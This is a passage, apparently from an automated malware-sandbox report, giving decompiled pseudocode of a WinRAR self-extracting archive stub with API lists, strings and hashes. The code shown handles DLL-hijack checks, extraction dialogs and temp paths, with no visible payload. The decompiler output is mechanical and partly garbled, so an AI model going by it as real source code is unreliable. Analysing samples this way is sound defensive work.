                						if(_t270 != 0) {
                							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
                						}
                						goto L1;
                					}
                					goto L7;
                				}
                				L1:
                				_t116 = 1;
                				goto L126;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00CBA5D6
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-1650746426
                • Opcode ID: cd9c575c311382b74b913db879134642be538da37b14a44b6cb8bd45a32ca973
                • Instruction ID: 52a8e0b5ead2dfcf3b071e1a9516303de52f1132e646172798a74c1a5d02e380
                • Opcode Fuzzy Hash: cd9c575c311382b74b913db879134642be538da37b14a44b6cb8bd45a32ca973
                • Instruction Fuzzy Hash: 7F4215B1945385BFEB219BA0DC8AFFE3B6CEB01704F040155F692AA0D1DBB44E45DB62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E00CAFD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
                				char _v1;
                				long _v4;
                				char* _t118;
                				void* _t126;
                				int _t130;
                				long _t141;
                				int _t167;
                				_Unknown_base(*)()* _t176;
                				_Unknown_base(*)()* _t177;
                				signed char _t184;
                				struct _SECURITY_ATTRIBUTES* _t195;
                				long _t197;
                				void* _t198;
                				struct HINSTANCE__* _t201;
                				signed int _t203;
                				signed int _t205;
                				void* _t206;
                				signed int _t207;
                				int _t208;
                				void* _t210;
                
                				E00CBD940();
                				_push(_t207);
                				_a3 = 0;
                				_t201 = GetModuleHandleW(L"kernel32");
                				if(_t201 == 0) {
                					L5:
                					_t118 =  *0xcdd080; // 0xcd2884
                					_t208 = _t207 | 0xffffffff;
                					_t202 = 0x800;
                					_a8 = L"version.dll";
                					_a12 = L"DXGIDebug.dll";
                					_a16 = L"sfc_os.dll";
                					_a20 = L"SSPICLI.DLL";
                					_a24 = L"rsaenh.dll";
                					_a28 = L"UXTheme.dll";
                					_a32 = L"dwmapi.dll";
                					_a36 = L"cryptbase.dll";
                					_a40 = L"lpk.dll";
                					_a44 = L"usp10.dll";
                					_a48 = L"clbcatq.dll";
                					_a52 = L"comres.dll";
                					_a56 = L"ws2_32.dll";
                					_a60 = L"ws2help.dll";
                					_a64 = L"psapi.dll";
                					_a68 = L"ieframe.dll";
                					_a72 = L"ntshrui.dll";
                					_a76 = L"atl.dll";
                					_a80 = L"setupapi.dll";
                					_a84 = L"apphelp.dll";
                					_a88 = L"userenv.dll";
                					_a92 = L"netapi32.dll";
                					_a96 = L"shdocvw.dll";
                					_a100 = L"crypt32.dll";
                					_a104 = L"msasn1.dll";
                					_a108 = L"cryptui.dll";
                					_a112 = L"wintrust.dll";
                					_a116 = L"shell32.dll";
                					_a120 = L"secur32.dll";
                					_a124 = L"cabinet.dll";
                					_a128 = L"oleaccrc.dll";
                					_a132 = L"ntmarta.dll";
                					_a136 = L"profapi.dll";
                					_a140 = L"WindowsCodecs.dll";
                					_a144 = L"srvcli.dll";
                					_a148 = L"cscapi.dll";
                					_a152 = L"slc.dll";
                					_a156 = L"imageres.dll";
                					_a160 = L"dnsapi.DLL";
                					_a164 = L"iphlpapi.DLL";
                					_a168 = L"WINNSI.DLL";
                					_a172 = L"netutils.dll";
                					_a176 = L"mpr.dll";
                					_a180 = L"devrtl.dll";
                					_a184 = L"propsys.dll";
                					_a188 = L"mlang.dll";
                					_a192 = L"samcli.dll";
                					_a196 = L"samlib.dll";
                					_a200 = L"wkscli.dll";
                					_a204 = L"dfscli.dll";
                					_a208 = L"browcli.dll";
                					_a212 = L"rasadhlp.dll";
                					_a216 = L"dhcpcsvc6.dll";
                					_a220 = L"dhcpcsvc.dll";
                					_a224 = L"XmlLite.dll";
                					_a228 = L"linkinfo.dll";
                					_a232 = L"cryptsp.dll";
                					_a236 = L"RpcRtRemote.dll";
                					_a240 = L"aclui.dll";
                					_a244 = L"dsrole.dll";
                					_a248 = L"peerdist.dll";
                					if( *_t118 == 0x78) {
                						L14:
                						GetModuleFileNameW(0,  &_a772, _t202);
                						E00CAFAB1( &_a9160, E00CAB943(_t223,  &_a772), _t202);
                						_t195 = 0;
                						_t203 = 0;
                						do {
                							if(E00CAA995() < 0x600) {
                								_t126 = 0;
                								__eflags = 0;
                							} else {
                								_t126 = E00CAFCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
                							}
                							if(_t126 == 0) {
                								L20:
                								_push(0x800);
                								E00CAB9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
                								_t130 = GetFileAttributesW( &_a760); // executed
                								if(_t130 != _t208) {
                									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
                									L24:
                									if(_v1 != 0) {
                										L30:
                										_t234 = _t195;
                										if(_t195 == 0) {
                											return _t130;
                										}
                										E00CAB98D(_t234,  &_a768);
                										if(E00CAA995() < 0x600) {
                											_push( &_a9160);
                											_push( &_a768);
                											E00CA3E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
                											_t210 = _t210 + 0x18;
                											_t130 = AllocConsole();
                											__eflags = _t130;
                											if(_t130 != 0) {
                												__imp__AttachConsole(GetCurrentProcessId());
                												_t141 = E00CC2B33( &_a4860);
                												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
                												Sleep(0x2710);
                												_t130 = FreeConsole();
                											}
                										} else {
                											E00CAFCFD(L"dwmapi.dll");
                											E00CAFCFD(L"uxtheme.dll");
                											_push( &_a9152);
                											_push( &_a760);
                											E00CA3E41( &_a4852, 0x864, E00CADA42(_t185, 0xf1), _t195);
                											_t210 = _t210 + 0x18;
                											_t130 = E00CB9735(0,  &_a4848, E00CADA42(_t185, 0xf0), 0x30);
                										}
                										ExitProcess(0);
                									}
                									_t205 = 0;
                									while(1) {
                										_push(0x800);
                										E00CAB9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
                										_t130 = GetFileAttributesW( &_a756);
                										if(_t130 != _t208) {
                											break;
                										}
                										_t205 = _t205 + 1;
                										if(_t205 < 0x35) {
                											continue;
                										}
                										goto L30;
                									}
                									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
                									goto L30;
                								}
                							} else {
                								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x24 + _t203 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
                								_t227 = _t130 - 2;
                								if(_t130 != 2) {
                									goto L21;
                								}
                								goto L20;
                							}
                							L21:
                							_t203 = _t203 + 1;
                						} while (_t203 < 8);
                						goto L24;
                					}
                					_t197 = E00CC6662(_t185, _t118);
                					_pop(_t185);
                					if(_t197 == 0) {
                						goto L14;
                					}
                					GetModuleFileNameW(0,  &_a4868, 0x800);
                					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
                					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
                						L13:
                						CloseHandle(_t206);
                						_t202 = 0x800;
                						goto L14;
                					} else {
                						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
                						_t222 = _t167;
                						if(_t167 == 0) {
                							goto L13;
                						}
                						_t185 = 0;
                						_push(0x104);
                						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
                						_push( &_a252);
                						_push( &_a13260);
                						while(1) {
                							_t198 = E00CAF835(_t222);
                							_t223 = _t198;
                							if(_t198 == 0) {
                								goto L13;
                							}
                							E00CAFCFD( &_a252);
                							_push(0x104);
                							_push( &_a248);
                							_push(_t198);
                						}
                						goto L13;
                					}
                				}
                				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
                				_t184 = _a46032;
                				if(_t176 != 0) {
                					asm("sbb ecx, ecx");
                					_t185 =  ~(_t184 & 0x000000ff) & 0x00cd22e4;
                					 *_t176( ~(_t184 & 0x000000ff) & 0x00cd22e4);
                				}
                				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
                				if(_t177 != 0) {
                					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
                					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
                					_v1 = 1;
                				}
                				goto L5;
                			}

                APIs
                • GetModuleHandleW.KERNEL32 ref: 00CAFD61
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CAFD79
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CAFD9C
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0047
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB005F
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB0071
                • ReadFile.KERNEL32(00000000,?,00007FFE,00CD28D4,00000000), ref: 00CB0090
                • CloseHandle.KERNEL32(00000000), ref: 00CB00E8
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB00FE
                • CompareStringW.KERNELBASE(00000400,00001001,00CD2920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00CB0158
                • GetFileAttributesW.KERNELBASE(?,?,00CD28EC,00000800,?,00000000,?,00000800), ref: 00CB0181
                • GetFileAttributesW.KERNEL32(?,?,00CD29AC,00000800), ref: 00CB01BA
                  • Part of subcall function 00CAFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                  • Part of subcall function 00CAFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                • _swprintf.LIBCMT ref: 00CB022A
                • _swprintf.LIBCMT ref: 00CB0276
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • AllocConsole.KERNEL32 ref: 00CB027E
                • GetCurrentProcessId.KERNEL32 ref: 00CB0288
                • AttachConsole.KERNEL32(00000000), ref: 00CB028F
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CB02B5
                • WriteConsoleW.KERNEL32(00000000), ref: 00CB02BC
                • Sleep.KERNEL32(00002710), ref: 00CB02C7
                • FreeConsole.KERNEL32 ref: 00CB02CD
                • ExitProcess.KERNEL32 ref: 00CB02D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                • API String ID: 1201351596-3298887752
                • Opcode ID: 19d31298ece57ec8ddbbb486b35fe60c582bc42dad4937c8d834b992a5c53fe2
                • Instruction ID: f71869c2aef5043ca70632152450f55ef63d9bc9f33c24b3b3d480865daa2f43
                • Opcode Fuzzy Hash: 19d31298ece57ec8ddbbb486b35fe60c582bc42dad4937c8d834b992a5c53fe2
                • Instruction Fuzzy Hash: ABD170F1008385ABDB35DF50C849BDFBBE8FFA5304F50491EE6899A240CBB09549DB62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 49%
                			E00CBB4C7(void* __edx) {
                				intOrPtr _t215;
                				void* _t220;
                				intOrPtr _t278;
                				void* _t291;
                				WCHAR* _t293;
                				void* _t296;
                				WCHAR* _t297;
                				void* _t302;
                
                				_t291 = __edx;
                				E00CBD870(E00CD150B, _t302);
                				_t215 = 0x1bc80;
                				E00CBD940();
                				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
                					L169:
                					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
                					return _t215;
                				}
                				_push(0x1000);
                				_push(_t302 - 0xe);
                				_push(_t302 - 0xd);
                				_push(_t302 - 0x5c84);
                				_push(_t302 - 0xfc8c);
                				_push( *((intOrPtr*)(_t302 + 0xc)));
                				_t215 = E00CBA156();
                				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
                				if(0x1bc80 != 0) {
                					_t278 =  *((intOrPtr*)(_t302 + 0x10));
                					do {
                						_t220 = _t302 - 0x5c84;
                						_t296 = _t302 - 0x1bc8c;
                						_t293 = 6;
                						goto L4;
                						L6:
                						while(E00CB1410(_t302 - 0xfc8c,  *((intOrPtr*)(0xcdd618 + _t297 * 4))) != 0) {
                							_t297 =  &(_t297[0]);
                							if(_t297 < 0xe) {
                								continue;
                							} else {
                								goto L167;
                							}
                						}
                						if(_t297 > 0xd) {
                							goto L167;
                						}
                						switch( *((intOrPtr*)(_t297 * 4 +  &M00CBC0D7))) {
                							case 0:
                								__eflags = _t278 - 2;
                								if(_t278 != 2) {
                									goto L167;
                								}
                								_t299 = 0x800;
                								E00CB95F8(_t302 - 0x7c84, 0x800);
                								E00CAA188(E00CAB625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
                								 *(_t302 - 4) = _t293;
                								E00CAA2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
                								E00CA6EF9(_t302 - 0x3c84);
                								_push(_t293);
                								_t286 = _t302 - 0x8c8c;
                								_t238 = E00CAA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
                								__eflags = _t238;
                								if(_t238 == 0) {
                									L28:
                									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
                									E00CAA19E(_t302 - 0x8c8c);
                									goto L167;
                								} else {
                									goto L15;
                									L16:
                									E00CAB1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
                									E00CAAEA5(__eflags, _t302 - 0x103c, _t299);
                									_t301 = E00CC2B33(_t302 - 0x7c84);
                									__eflags = _t301 - 4;
                									if(_t301 < 4) {
                										L18:
                										_t266 = E00CAB5E5(_t302 - 0x5c84);
                										__eflags = _t266;
                										if(_t266 != 0) {
                											goto L28;
                										}
                										L19:
                										_t268 = E00CC2B33(_t302 - 0x3c84);
                										__eflags = 0;
                										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
                										E00CBE920(_t293, _t302 - 0x3c, _t293, 0x1e);
                										_t304 = _t304 + 0x10;
                										 *((intOrPtr*)(_t302 - 0x38)) = 3;
                										_push(0x14);
                										_pop(_t271);
                										 *((short*)(_t302 - 0x2c)) = _t271;
                										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
                										_push(_t302 - 0x3c);
                										 *0xcddef4();
                										goto L20;
                									}
                									_t276 = E00CC2B33(_t302 - 0x103c);
                									__eflags = _t301 - _t276;
                									if(_t301 > _t276) {
                										goto L19;
                									}
                									goto L18;
                									L20:
                									_t243 = GetFileAttributesW(_t302 - 0x3c84);
                									__eflags = _t243 - 0xffffffff;
                									if(_t243 == 0xffffffff) {
                										L27:
                										_push(_t293);
                										_t286 = _t302 - 0x8c8c;
                										_t245 = E00CAA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
                										__eflags = _t245;
                										if(_t245 != 0) {
                											_t299 = 0x800;
                											L15:
                											SetFileAttributesW(_t302 - 0x3c84, _t293);
                											__eflags =  *((char*)(_t302 - 0x2c78));
                											if(__eflags == 0) {
                												goto L20;
                											}
                											goto L16;
                										}
                										goto L28;
                									}
                									_t247 = DeleteFileW(_t302 - 0x3c84);
                									__eflags = _t247;
                									if(_t247 != 0) {
                										goto L27;
                									} else {
                										_t300 = _t293;
                										_push(_t293);
                										goto L24;
                										L24:
                										E00CA3E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
                										_t304 = _t304 + 0x14;
                										_t252 = GetFileAttributesW(_t302 - 0x103c);
                										__eflags = _t252 - 0xffffffff;
                										if(_t252 != 0xffffffff) {
                											_t300 = _t300 + 1;
                											__eflags = _t300;
                											_push(_t300);
                											goto L24;
                										} else {
                											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
                											__eflags = _t255;
                											if(_t255 != 0) {
                												MoveFileExW(_t302 - 0x103c, _t293, 4);
                											}
                											goto L27;
                										}
                									}
                								}
                							case 1:
                								__eflags = __ebx;
                								if(__ebx == 0) {
                									__eax = E00CC2B33(__esi);
                									__eax = __eax + __edi;
                									_push(__eax);
                									_push( *0xcfce0c);
                									__eax = E00CC2B5E(__ecx, __edx);
                									__esp = __esp + 0xc;
                									__eflags = __eax;
                									if(__eax != 0) {
                										 *0xcfce0c = __eax;
                										__eflags = __bl;
                										if(__bl != 0) {
                											__ecx = 0;
                											__eflags = 0;
                											 *__eax = __cx;
                										}
                										__eax = E00CC66ED(__eax, __esi);
                										_pop(__ecx);
                										_pop(__ecx);
                									}
                									__eflags = __bh;
                									if(__bh == 0) {
                										__eax = L00CC2B4E(__esi);
                									}
                								}
                								goto L167;
                							case 2:
                								__eflags = __ebx;
                								if(__ebx == 0) {
                									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
                								}
                								goto L167;
                							case 3:
                								__eflags = __ebx;
                								if(__ebx != 0) {
                									goto L167;
                								}
                								__eflags =  *0xce9602 - __di;
                								if( *0xce9602 != __di) {
                									goto L167;
                								}
                								__eax = 0;
                								__edi = __ebp - 0x5c84;
                								_push(0x22);
                								 *(__ebp - 0x103c) = __ax;
                								_pop(__eax);
                								__eflags =  *(__ebp - 0x5c84) - __ax;
                								if( *(__ebp - 0x5c84) == __ax) {
                									__edi = __ebp - 0x5c82;
                								}
                								__eax = E00CC2B33(__edi);
                								__esi = 0x800;
                								__eflags = __eax - 0x800;
                								if(__eax >= 0x800) {
                									goto L167;
                								} else {
                									__eax =  *__edi & 0x0000ffff;
                									_push(0x5c);
                									_pop(__ecx);
                									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                									if(( *__edi & 0x0000ffff) != 0x2e) {
                										L54:
                										__eflags = __ax - __cx;
                										if(__ax == __cx) {
                											L66:
                											__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, __esi);
                											__ebx = 0;
                											__eflags = 0;
                											L67:
                											_push(0x22);
                											_pop(__eax);
                											__eax = __ebp - 0x103c;
                											__eax = E00CC0D9B(__ebp - 0x103c, __ebp - 0x103c);
                											_pop(__ecx);
                											_pop(__ecx);
                											__eflags = __eax;
                											if(__eax != 0) {
                												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
                												if( *((intOrPtr*)(__eax + 2)) == __bx) {
                													__ecx = 0;
                													__eflags = 0;
                													 *__eax = __cx;
                												}
                											}
                											__eax = __ebp - 0x103c;
                											__edi = 0xce9602;
                											E00CAFAB1(0xce9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
                											__eax = E00CB9FFC(__ebp - 0x103c, __esi);
                											__esi = GetDlgItem( *(__ebp + 8), 0x66);
                											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
                											__ebx =  *0xcddf7c;
                											__eax = SendMessageW(__esi, 0x143, __ebx, 0xce9602); // executed
                											__eax = __ebp - 0x103c;
                											__eax = E00CC2B69(__ebp - 0x103c, 0xce9602, __eax);
                											_pop(__ecx);
                											_pop(__ecx);
                											__eflags = __eax;
                											if(__eax != 0) {
                												__ebp - 0x103c = 0;
                												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
                											}
                											goto L167;
                										}
                										__eflags = __ax;
                										if(__ax == 0) {
                											L57:
                											__eax = __ebp - 0x18;
                											__ebx = 0;
                											_push(__ebp - 0x18);
                											_push(1);
                											_push(0);
                											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                											_push(0x80000002);
                											__eax =  *0xcddea8();
                											__eflags = __eax;
                											if(__eax == 0) {
                												__eax = __ebp - 0x14;
                												 *(__ebp - 0x14) = 0x1000;
                												_push(__ebp - 0x14);
                												__eax = __ebp - 0x103c;
                												_push(__ebp - 0x103c);
                												__eax = __ebp - 0x1c;
                												_push(__ebp - 0x1c);
                												_push(0);
                												_push(L"ProgramFilesDir");
                												_push( *(__ebp - 0x18));
                												__eax =  *0xcddea4();
                												_push( *(__ebp - 0x18));
                												 *0xcdde84() =  *(__ebp - 0x14);
                												__ecx = 0x7ff;
                												__eax =  *(__ebp - 0x14) >> 1;
                												__eflags = __eax - 0x7ff;
                												if(__eax >= 0x7ff) {
                													__eax = 0x7ff;
                												}
                												__ecx = 0;
                												__eflags = 0;
                												 *(__ebp + __eax * 2 - 0x103c) = __cx;
                											}
                											__eflags =  *(__ebp - 0x103c) - __bx;
                											if( *(__ebp - 0x103c) != __bx) {
                												__eax = __ebp - 0x103c;
                												__eax = E00CC2B33(__ebp - 0x103c);
                												_push(0x5c);
                												_pop(__ecx);
                												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
                												if(__eflags != 0) {
                													__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, "\\", __esi);
                												}
                											}
                											__esi = E00CC2B33(__edi);
                											__eax = __ebp - 0x103c;
                											__eflags = __esi - 0x7ff;
                											__esi = 0x800;
                											if(__eflags < 0) {
                												__ebp - 0x103c = E00CAFA89(__eflags, __ebp - 0x103c, __edi, 0x800);
                											}
                											goto L67;
                										}
                										__eflags =  *((short*)(__edi + 2)) - 0x3a;
                										if( *((short*)(__edi + 2)) == 0x3a) {
                											goto L66;
                										}
                										goto L57;
                									}
                									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                									if( *((intOrPtr*)(__edi + 2)) != __cx) {
                										goto L54;
                									}
                									__edi = __edi + 4;
                									__ebx = 0;
                									__eflags =  *__edi - __bx;
                									if( *__edi == __bx) {
                										goto L167;
                									} else {
                										__ebp - 0x103c = E00CAFAB1(__ebp - 0x103c, __edi, 0x800);
                										goto L67;
                									}
                								}
                							case 4:
                								__eflags =  *0xce95fc - 1;
                								__eflags = __eax - 0xce95fc;
                								 *__edi =  *__edi + __ecx;
                								__eflags =  *(__ebx + 6) & __bl;
                								 *__eax =  *__eax + __al;
                								__eflags =  *__eax;
                							case 5:
                								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                								__ecx = 0;
                								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                								__eflags = __eax;
                								if(__eax == 0) {
                									L84:
                									 *0xce75d2 = __cl;
                									 *0xce75d3 = 1;
                									goto L167;
                								}
                								__eax = __eax - 0x30;
                								__eflags = __eax;
                								if(__eax == 0) {
                									 *0xce75d2 = __cl;
                									L83:
                									 *0xce75d3 = __cl;
                									goto L167;
                								}
                								__eax = __eax - 1;
                								__eflags = __eax;
                								if(__eax == 0) {
                									goto L84;
                								}
                								__eax = __eax - 1;
                								__eflags = __eax;
                								if(__eax != 0) {
                									goto L167;
                								}
                								 *0xce75d2 = 1;
                								goto L83;
                							case 6:
                								__eflags = __ebx - 4;
                								if(__ebx != 4) {
                									goto L94;
                								}
                								__eax = __ebp - 0x5c84;
                								__eax = E00CC2B69(__ebp - 0x5c84, __eax, L"<>");
                								_pop(__ecx);
                								_pop(__ecx);
                								__eflags = __eax;
                								if(__eax == 0) {
                									goto L94;
                								}
                								_push(__edi);
                								goto L93;
                							case 7:
                								__eflags = __ebx - 1;
                								if(__eflags != 0) {
                									L115:
                									__eflags = __ebx - 7;
                									if(__ebx == 7) {
                										__eflags =  *0xce95fc;
                										if( *0xce95fc == 0) {
                											 *0xce95fc = 2;
                										}
                										 *0xce85f8 = 1;
                									}
                									goto L167;
                								}
                								__eax = __ebp - 0x7c84;
                								__edi = 0x800;
                								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
                								E00CAAEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
                								__esi = 0;
                								_push(0);
                								while(1) {
                									_push( *0xcdd5f8);
                									__ebp - 0x7c84 = E00CA3E41(0xce85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
                									__eax = E00CA9E6B(0xce85fa);
                									__eflags = __al;
                									if(__al == 0) {
                										break;
                									}
                									__esi =  &(__esi->i);
                									__eflags = __esi;
                									_push(__esi);
                								}
                								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xce85fa);
                								__eflags =  *(__ebp - 0x5c84);
                								if( *(__ebp - 0x5c84) == 0) {
                									goto L167;
                								}
                								__eflags =  *0xcf5d02;
                								if( *0xcf5d02 != 0) {
                									goto L167;
                								}
                								__eax = 0;
                								 *(__ebp - 0x143c) = __ax;
                								__eax = __ebp - 0x5c84;
                								_push(0x2c);
                								_push(__ebp - 0x5c84);
                								__eax = E00CC0BB8(__ecx);
                								_pop(__ecx);
                								_pop(__ecx);
                								__eflags = __eax;
                								if(__eax != 0) {
                									L111:
                									__eflags =  *(__ebp - 0x143c);
                									if( *(__ebp - 0x143c) == 0) {
                										__ebp - 0x1bc8c = __ebp - 0x5c84;
                										E00CAFAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
                										__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
                									}
                									__ebp - 0x5c84 = E00CB9C4F(__ebp - 0x5c84);
                									__eax = 0;
                									 *(__ebp - 0x4c84) = __ax;
                									__ebp - 0x143c = __ebp - 0x5c84;
                									__eax = E00CB9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
                									__eflags = __eax - 6;
                									if(__eax == 6) {
                										goto L167;
                									} else {
                										__eax = 0;
                										__eflags = 0;
                										 *0xce75d7 = 1;
                										 *0xce85fa = __ax;
                										__eax = EndDialog( *(__ebp + 8), 1);
                										goto L115;
                									}
                								}
                								__edx = 0;
                								__esi = 0;
                								__eflags =  *(__ebp - 0x5c84) - __dx;
                								if( *(__ebp - 0x5c84) == __dx) {
                									goto L111;
                								}
                								__ecx = 0;
                								__eax = __ebp - 0x5c84;
                								while(1) {
                									__eflags =  *__eax - 0x40;
                									if( *__eax == 0x40) {
                										break;
                									}
                									__esi =  &(__esi->i);
                									__eax = __ebp - 0x5c84;
                									__ecx = __esi + __esi;
                									__eax = __ebp - 0x5c84 + __ecx;
                									__eflags =  *__eax - __dx;
                									if( *__eax != __dx) {
                										continue;
                									}
                									goto L111;
                								}
                								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
                								__ebp - 0x143c = E00CAFAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
                								__eax = 0;
                								__eflags = 0;
                								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
                								goto L111;
                							case 8:
                								__eflags = __ebx - 3;
                								if(__ebx == 3) {
                									__eflags =  *(__ebp - 0x5c84) - __di;
                									if(__eflags != 0) {
                										__eax = __ebp - 0x5c84;
                										_push(__ebp - 0x5c84);
                										__eax = E00CC668C(__ebx, __edi);
                										_pop(__ecx);
